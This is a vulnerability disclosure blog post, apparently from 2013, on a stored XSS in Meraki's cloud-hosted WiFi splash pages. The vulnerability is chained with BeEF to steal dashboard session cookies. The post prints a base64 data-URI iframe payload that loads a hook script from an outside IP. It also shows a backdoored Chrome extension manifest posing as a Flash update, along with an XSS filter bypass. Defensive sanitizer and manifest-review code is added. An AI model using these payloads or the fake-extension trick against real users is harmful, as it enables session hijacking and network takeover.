Monday, March 11, 2013

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting is probably not the most appealing topic for you. Nevertheless, recent events demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

Today, we are going to present a possible attack scenario based on a real-life vulnerability that has been recently patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it shows how a trivial XSS flaw can be abused to subvert an entire network infrastructure.



Meraki

Meraki is the first cloud-managed network infrastructure company and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud-managed Wireless Access Point, we noticed it was possible to personalize the portal splash page. Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing the Internet.

To further customize our splash page, we started including images and other HTML tags. To our surprise, we quickly discovered that only basic HTML/JS validation was performed in that context. As a result, we were able to include things like:


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. Provided you supply the right token and the other required parameters, that page is accessible to any Internet user.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This turns the stored XSS affecting our own device's domain into a vulnerability that can be abused to retrieve the dashboard cookie of other users and networks.
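
The cookie scope is what turns a single-tenant XSS into a cross-tenant one, so here is an added example (our own code, not from the original post or from Meraki) that applies the RFC 6265 domain-matching rule to two ways the dash_auth cookie could have been scoped. The splash host n20.meraki.com is the one in the URL above; the dashboard hostname dashboard.meraki.com is an assumption made for illustration, since the post only says the token is scoped to *.meraki.com.

```python
# Added example: RFC 6265 section 5.1.3 domain matching, used to show why a
# session cookie scoped to the parent domain is readable from any subdomain
# that suffers an XSS. "dashboard.meraki.com" below is an assumed hostname.


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 5.1.3: the request host domain-matches the cookie domain when
    they are identical, or when the host ends with "." + cookie_domain."""
    request_host = request_host.lower().rstrip(".")
    cookie_domain = cookie_domain.lower().strip(".")
    if request_host == cookie_domain:
        return True
    return request_host.endswith("." + cookie_domain)


def cookie_in_scope(request_host: str, cookie: dict) -> bool:
    """A host-only cookie (set without a Domain attribute) is sent only to the
    exact host that set it; a cookie with a Domain attribute is sent to every
    host that domain-matches it, so script running on any of those hosts
    operates in a context where the browser attaches that cookie."""
    if cookie["domain"] is None:
        return request_host.lower().rstrip(".") == cookie["host"].lower()
    return domain_matches(request_host, cookie["domain"])


# Constructed: the same dashboard session cookie scoped two different ways.
WIDE_COOKIE = {"name": "dash_auth", "host": "dashboard.meraki.com", "domain": ".meraki.com"}
HOST_ONLY_COOKIE = {"name": "dash_auth", "host": "dashboard.meraki.com", "domain": None}


def exposed_to(splash_host: str) -> dict:
    """Which scoping variant is in scope for a page on splash_host. HttpOnly
    does not enter into this: it only keeps the cookie out of document.cookie,
    while scope is decided entirely by the Domain attribute."""
    return {
        "domain=.meraki.com": cookie_in_scope(splash_host, WIDE_COOKIE),
        "host-only": cookie_in_scope(splash_host, HOST_ONLY_COOKIE),
    }


if __name__ == "__main__":
    # Splash pages live on hosts like n20.meraki.com (the URL in the post).
    for variant, in_scope in exposed_to("n20.meraki.com").items():
        print(f"{variant:20} in scope on the splash host: {in_scope}")
    # A lookalike registrable domain never matches: the rule needs the "."
    # boundary, so "evilmeraki.com" is out of scope for a meraki.com cookie.
    print(domain_matches("evilmeraki.com", "meraki.com"))
```

Running it shows the Domain-scoped cookie in scope for n20.meraki.com while the host-only one is not. Setting the dashboard cookie host-only (no Domain attribute), or serving customer-editable splash pages from a separate registrable domain, is the scoping change that removes the cross-tenant reach regardless of how the splash HTML is filtered.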

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows someone to completely take over Meraki's wired and wireless networks.

BeEF, the well-known Browser Exploitation Framework, has been used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook
  2. By connecting a device (e.g. a testing device) to the physical wireless network controlled by the attacker, it is possible to retrieve the URL of the splash page, including the unique token
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim's browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and gain access to the victim's Meraki dashboard
  6. In the case of a Meraki WiFi Access Point, a convenient map displays the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security: it is possible to bypass those mitigations, although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via a JS payload isn't trivial anymore. Cross Site Tracing and similar techniques are obsolete, and browser plugins have also been patched. Besides exploiting specific server or browser bugs, attackers can only rely on social engineering tricks. During our Proof-of-Concept, a fake Flash update was used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override the default SOP restrictions: it can issue cross-domain requests and read the HTTP response, access other browser tabs, and read every cookie, including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome Extension is the following; the background.js file loads the BeEF hook.

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest securty updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": {
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png"
      },
      "permissions": [
        "tabs",
        "http://*/*",
        "https://*/*",
        "cookies"
      ]
    }

    Not to blame Google, but FYI: when the backdoored Chrome Extension was uploaded to the Google Chrome Web Store, it was available straight after the upload. No checks were made by the application, for example to prevent the upload of an extension with very relaxed permissions, an unsafe-eval CSP directive, and Name/Description fields containing obviously fake content such as "Adobe Flash Update"
  • Choosing Google Chrome as the target browser required bypassing the XSS Auditor, the integrated anti-XSS filter. As discovered by Mario Heiderich, the data URI scheme with base64 content can be leveraged to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71)


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome Extension running in your browser opens up many new attack vectors which we didn't cover in the PoC. For example, it is possible to inject the BeEF hook in every open tab (you can imagine the impact of this :-), or to use the victim's browser as an open proxy using BeEF's Tunneling Proxy component, and many other attacks.
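
The root cause of the whole chain is the missing input control on the splash page, so here is an added example of that control: an allowlist sanitizer for customer-editable splash HTML. It is our own code, not anything from the original post or from Meraki. It rebuilds the page from an allowlist of tags and attributes (the allowlist is an assumption about what a splash page needs), strips on* handlers and non-http(s) URLs, and decodes base64 data: URIs into its audit findings so a reviewer can see what would have run. The sample input is constructed and mixes a benign page with the same shapes used above (event handler, javascript: link, inline script, and an iframe carrying a base64 data: URI).

```python
# Added example (not from the original post): allowlist sanitizer for
# customer-editable splash HTML. The allowlist itself is an assumption.
import base64
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li",
                "h1", "h2", "h3", "a", "img", "div", "span"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "*": {"class", "id"}}
# HTML void elements never get an end tag, so a dropped one must not open a
# "skip until the end tag" region that would swallow the rest of the page.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}
URL_ATTRS = {"href", "src"}


def safe_url(value: str) -> bool:
    """Allow only http(s) and relative URLs. Control characters and spaces are
    removed first because browsers ignore them inside a scheme, so a value like
    "java\\nscript:" would otherwise slip past a naive prefix check."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    m = re.match(r"([a-zA-Z][a-zA-Z0-9+.-]*):", cleaned)
    return m is None or m.group(1).lower() in ("http", "https")


def describe_data_uri(value: str) -> list:
    """Decode a data: URI (base64 or plain) so the audit log shows its content."""
    m = re.match(r"data:([^,]*?)(;base64)?,(.*)", value.strip(), re.I | re.S)
    if not m:
        return []
    payload = m.group(3)
    if m.group(2):
        try:
            payload = base64.b64decode(payload + "=" * (-len(payload) % 4)).decode("utf-8", "replace")
        except ValueError:
            return ["data: URI with undecodable base64 payload"]
    return [f"data: URI ({m.group(1) or 'text/plain'}) decoded to: {payload[:80]!r}"]


class SplashSanitizer(HTMLParser):
    """Rebuilds the document from allowlisted tags; everything else is dropped
    and recorded in self.findings. Comments, doctypes and processing
    instructions fall through to the base class, which discards them."""

    def __init__(self):
        super().__init__()
        self.out, self.findings = [], []
        self._skip = 0  # >0 while inside a dropped element such as <script>

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"dropped <{tag}>")
            for name, value in attrs:
                if name in URL_ATTRS and value:
                    self.findings.extend(describe_data_uri(value))
            if tag not in VOID_TAGS:
                self._skip += 1
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()) | ALLOWED_ATTRS["*"]:
                continue
            elif name in URL_ATTRS and not safe_url(value):
                self.findings.append(f"dropped {name}={value!r} on <{tag}>")
            else:
                kept.append(f' {name}="{html.escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            if tag not in VOID_TAGS:
                self._skip = max(0, self._skip - 1)
        elif not self._skip and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))


def sanitize(splash_html: str):
    """Return (clean_html, findings) for one submitted splash page."""
    p = SplashSanitizer()
    p.feed(splash_html)
    p.close()
    return "".join(p.out), p.findings


# Constructed sample: a benign page with the post's attack shapes mixed in.
INLINE_PAYLOAD = base64.b64encode(b"<script>alert(1)</script>").decode()
SAMPLE_SPLASH = (
    "<h1>Welcome to the guest WiFi</h1>"
    '<p>Please read the <a href="https://example.com/terms">terms</a>.</p>'
    '<img src="logo.png" alt="logo" onerror="alert(1)">'
    '<a href="javascript:alert(1)">click</a>'
    "<script>alert(1)</script>"
    f'<iframe src="data:text/html;base64,{INLINE_PAYLOAD}"></iframe>'
)

if __name__ == "__main__":
    clean, findings = sanitize(SAMPLE_SPLASH)
    print(clean)
    for finding in findings:
        print("audit:", finding)
```

An allowlist that rebuilds the document is preferable to a denylist that removes known-bad patterns: the XSS Auditor bypass above shows how one encoding layer (base64 inside a data: URI) defeats pattern matching, whereas the sanitizer never needs to recognise the payload, only to refuse the iframe and the data: scheme. Findings are returned rather than printed so they can be logged against the tenant that submitted the page.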
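
As an added example for the extension side of the PoC (our code, not from the post or from Google), here is a small manifest review check that flags the combination the backdoored extension relied on: broad host permissions together with "cookies", the "tabs" permission, an 'unsafe-eval' script-src, and a remote script host in the CSP. The sample inputs are the post's own manifest, reproduced verbatim, and a constructed minimal manifest for comparison; the MV3 forms (host_permissions and the object form of content_security_policy) are handled because the same review applies there.

```python
# Added example (not from the original post): reviewer checks for Chrome
# extension manifests. Wording of the findings is ours.
import json

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def parse_csp(csp: str) -> dict:
    """'script-src a b; object-src c' -> {'script-src': ['a', 'b'], ...}"""
    out = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            out[parts[0].lower()] = parts[1:]
    return out


def review_manifest(manifest_text: str) -> list:
    """Return a list of review findings; an empty list means nothing to flag."""
    m = json.loads(manifest_text)
    findings = []
    perms = list(m.get("permissions", [])) + list(m.get("host_permissions", []))
    broad = [p for p in perms if p in BROAD_HOSTS]
    if broad:
        findings.append("broad host access: " + ", ".join(broad))
    if "cookies" in perms and broad:
        # chrome.cookies needs the "cookies" permission plus host access for
        # the sites in question; with every host allowed that is every cookie,
        # HttpOnly included.
        findings.append("'cookies' with broad host access: can read every cookie, HttpOnly included")
    if "tabs" in perms:
        findings.append("'tabs': can read the URL and title of every open tab")
    csp = m.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 shape: {"extension_pages": ..., "sandbox": ...}
        csp = csp.get("extension_pages", "")
    script_src = parse_csp(csp).get("script-src", [])
    if "'unsafe-eval'" in script_src:
        findings.append("CSP script-src allows 'unsafe-eval'")
    remote = [s for s in script_src if not s.startswith("'")]
    if remote:
        findings.append("CSP script-src loads scripts from outside the package: " + ", ".join(remote))
    return findings


# The post's manifest, reproduced as sample input.
POST_MANIFEST = """{
  "name": "Adobe Flash Player Security Update",
  "manifest_version": 2,
  "version": "11.5.502.149",
  "description": "Updates Adobe Flash Player with latest securty updates",
  "background": {"scripts": ["background.js"]},
  "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
  "icons": {"16": "icon16.png", "48": "icon48.png", "128": "icon128.png"},
  "permissions": ["tabs", "http://*/*", "https://*/*", "cookies"]
}"""

# Constructed: a genuinely minimal MV3 manifest for comparison.
MINIMAL_MANIFEST = """{
  "name": "Example Notes",
  "manifest_version": 3,
  "version": "1.0",
  "permissions": ["storage"],
  "host_permissions": ["https://notes.example/*"],
  "content_security_policy": {"extension_pages": "script-src 'self'; object-src 'self'"}
}"""

if __name__ == "__main__":
    for label, text in (("post manifest", POST_MANIFEST), ("minimal manifest", MINIMAL_MANIFEST)):
        print(label, "->", review_manifest(text) or "no findings")
```

In a store-side or enterprise allowlist review, a non-empty result is the point at which a person should open the package before it is allowed to install. The MV3 platform no longer accepts remote script-src hosts or 'unsafe-eval' in extension pages, so for current extensions the host-permission and "cookies" checks are the ones that still matter.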

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response.
